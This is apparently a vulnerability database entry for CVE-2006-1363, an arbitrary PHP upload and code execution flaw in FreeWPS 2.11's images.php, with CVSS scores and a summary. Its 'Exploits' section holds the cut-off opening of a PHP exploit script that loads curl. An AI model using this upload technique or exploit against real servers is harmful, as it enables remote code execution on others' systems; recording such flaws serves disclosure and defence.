7.5
CVSSv2

CVE-2006-1363

Published: 23/03/2006 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

images.php in Justin White (aka YTZ) Free Web Publishing System (FreeWPS) 2.11 allows remote malicious users to execute arbitrary PHP code by uploading a .php file into the /upload directory as specified in the dirPath parameter, then performing a direct request to that file.

Vulnerable Product Search on Vulmon Subscribe to Product

justin white freewps 2.11

Exploits

<? error_reporting(E_ERROR); function exploit_init() { if (!extension_loaded('php_curl') && !extension_loaded('curl')) { if (!dl('curlso') && !dl('php_curldll')) die ("oo error - cannot load curl extension!"); } } function exploit_header() { echo "\nooooooooooooooooooooooooooooooooooooooooooooooo ...